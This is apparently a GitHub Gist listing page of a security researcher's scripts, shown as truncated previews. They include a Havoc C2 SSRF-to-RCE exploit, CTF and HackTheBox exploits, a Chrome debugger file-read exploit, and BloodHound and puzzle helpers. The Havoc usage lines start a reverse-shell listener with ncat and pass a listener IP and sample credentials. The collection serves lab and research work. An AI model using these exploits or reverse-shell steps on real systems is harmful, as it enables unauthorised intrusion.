LongCat pich4ya
pich4ya
/ havoc_ssrf2rce.py
Last active
January 21, 2025 15:49
The modified exploit code of SSRF (CVE-2024-41570) from @_chebuya and authN RCE from Laurence Tennant, Include Security
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Havoc C2 SSRF to AuthN RCE | |
| # @author longcat (https://sth.sh) | |
| # | |
| # sudo ncat -lvp 443 | |
| # python havoc_ssrf2rce.py -t https://havoc.c2/ -l 1.3.3.7 --c2user 5pider --c2pass RKnnj5Vfq3bt9y7L | |
| # | |
| # The original authors are @_chebuya (SSRF) and Laurence Tennant, Include Security (AuthN RCE) | |
| # Their writeups are great. I am so fascinating to read @_chebuya blog post :) | |
| # My work is just to integrate them into one single shot exploit. | |
| # In short, make WebSocket works with Havoc C2 Agent Payload |
pich4ya
/ bookclub_exploit_rce.py
Last active
December 29, 2024 07:42
Exploit for SEC Playground Bloody Xmas 2024 - Bookclub
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # @author: longcat | |
| # SEC Playground Bloody Xmas 2024 - Bookclub | |
| # Exploit #2 - Read Flag w/ RCE (Reverse Shell) | |
| import requests | |
| import sys | |
| import time | |
| import argparse | |
| import urllib3 |
pich4ya
/ htb_clicker.py
Last active
April 20, 2024 14:21
Exploit for HackTheBox Clicker Machine (https://app.hackthebox.com/machines/564)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # @author Pichaya Morimoto (p.morimoto@sth.sh) | |
| # Exploit for HackTheBox Clicker Machine (https://app.hackthebox.com/machines/564) | |
| import requests | |
| import random | |
| import string | |
| import urllib.parse | |
| from base64 import b64encode,b64decode | |
| requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) | |
| proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} |
pich4ya
/ bloodhound-python_issues.txt
Created
April 16, 2024 05:13
Common solutions for Bloodhound-python errors, problems and issues
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # @author Pichaya Morimoto (p.morimoto@sth.sh) | |
| # Compiled list of my common bloodhound-python problems & solutions | |
| Bloodhound-python Error #0 | |
| You do not get info like GPO and permission abuse edges. | |
| You need to add option -> -c All,LoggedOn | |
| Bloodhound-python Error #1 | |
| raise NoNameservers(request=self.request, errors=self.errors) | |
| dns.resolver.NoNameservers: All nameservers failed to answer the query _ldap._tcp.pdc._msdcs.DCHOSTNAME. IN SRV: Server 10.3.3.7 TCP port 53 answered SERVFAIL |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # A numeric lock has a 3 digit key | |
| # "682" - One number is correct and well placed | |
| # "614" - One number is correct but wrongly placed | |
| # "206" - Two number are correct but wrongly placed | |
| # "738" - Nothing is correct | |
| # "780" - One number is correct but wrongly placed | |
| from z3 import * | |
| # Create three integer variables for the lock digits |
pich4ya
/ apk_getString_R_string.py
Last active
January 19, 2025 15:28
This script can be used to replace strings.xml values in a target Java file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # @author Pichaya Morimoto (p.morimoto@sth.sh) | |
| # I tried all jadx options for debof, but it did not work. | |
| # This script can be used to replace strings.xml values in a target Java file | |
| # if (!Intrinsics.areEqual(param, context.getString(R.string.m1))) { -> if (!Intrinsics.areEqual(param, "monday")) { | |
| # Prompted and modified with ChatGPT for FlareOn 10's ItsOnFire | |
| # Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources/com/secure/itsonfire/MessageWorker.java | |
| # Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources | |
| import xml.etree.ElementTree as ET | |
| import re | |
| import sys |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env zsh | |
| # @author Pichaya Morimoto (p.morimoto@sth.sh) | |
| # Ansible's Vultr module is suck. I have built my own. | |
| # Nuke all my Vultr instances | |
| ssh_key=$(cat ~/.ssh/id_ed25519_vultr.pub) | |
| echo $ssh_key | |
| # List Instances | |
| curl "https://api.vultr.com/v2/instances" \ | |
| -X GET \ |
pich4ya
/ lookingglass_ssh.txt
Created
March 17, 2023 15:34
TryHackMe "Looking Glass" - Find the right port with binary search
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/zsh | |
| # @author Pichaya Morimoto (p.morimoto@sth.sh) | |
| # https://tryhackme.com/room/lookingglass | |
| # 10.10.169.23 | |
| function ssh_connect { | |
| ssh root@10.10.169.23 -p $1 2>/dev/null | grep -q 'Higher' && echo "Higher" && exit 0 | |
| echo "Lower" | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # @author Pichaya Morimoto (p.morimoto@sth.sh) | |
| # 2023-03-07 | |
| # Weed Shop RCE Exploit | |
| import requests | |
| def create_dbfile(filename): | |
| # Vulnerability 1: IP Spoofing | |
| # File: function.php |
pich4ya
/ chrome_remote_debug_lfi.py
Created
March 6, 2023 11:49
Chrome Debugger Local File Inclusion (No CVE, a security misconfiguration if the port is accessible for the attacker)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # @author Pichaya Morimoto (p.morimoto@sth.sh) | |
| # Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb | |
| # pip install requests websocket-client python-socks | |
| # This exploit code can be used to read arbitrary files on the victim machine with | |
| # chrome/chromium --remote-debugging-port=9222, usually runs as a test automation tool in any software testing phase | |
| import requests | |
| import json | |
| import urllib3 | |
| import websocket |
NewerOlder